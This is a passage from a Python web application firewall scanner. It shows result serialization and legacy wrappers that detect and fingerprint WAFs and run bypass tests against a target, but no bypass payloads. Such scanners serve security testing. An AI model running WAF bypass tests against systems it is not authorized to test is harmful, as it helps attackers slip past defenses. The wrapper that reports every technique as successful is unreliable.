                    "scan_duration": result.scan_duration,
                    "findings": [
                        {
                            "waf_name": f.waf_name,
                            "detected": f.detected,
                            "indicators": f.indicators,
                            "bypass_techniques": f.bypass_techniques,
                            "severity": f.severity,
                            "confidence": f.confidence,
                            "details": f.details,
                        }
                        for f in result.findings
                    ],
                },
                f,
                indent=2,
            )

        logger.info(f"Results saved to {output_file}")


# ─── Legacy Functions ────────────────────────────────────────────────────────

def detect_waf(target: str, output_dir: str = "./results") -> dict:
    """Legacy WAF detection function."""
    scanner = WAFScanner(target, output_dir)
    finding = scanner.detect_waf()
    return {
        "target": target,
        "waf_detected": finding.detected,
        "waf_name": finding.waf_name,
        "indicators": finding.indicators,
    }


def fingerprint_waf(target: str, output_dir: str = "./results") -> dict:
    """Legacy WAF fingerprint function."""
    scanner = WAFScanner(target, output_dir)
    return scanner.fingerprint_waf()


def test_waf_bypass(target: str, output_dir: str = "./results") -> dict:
    """Legacy WAF bypass function."""
    scanner = WAFScanner(target, output_dir)
    findings = scanner.test_bypasses()
    return {
        "target": target,
        "bypasses_found": len(findings),
        "techniques": [
            {"name": f.bypass_techniques[0], "success": True}
            for f in findings
            if f.bypass_techniques
        ],
    }


def scan_waf(target: str, output_dir: str = "./results") -> dict:
    """Legacy full WAF scan function."""
    scanner = WAFScanner(target, output_dir)
    result = scanner.run_full_scan()
    return {
        "target": result.target,
        "waf_detected": result.waf_detected,
        "waf_name": result.waf_name,
        "bypasses_found": result.bypasses_found,
        "findings_count": len(result.findings),
    }
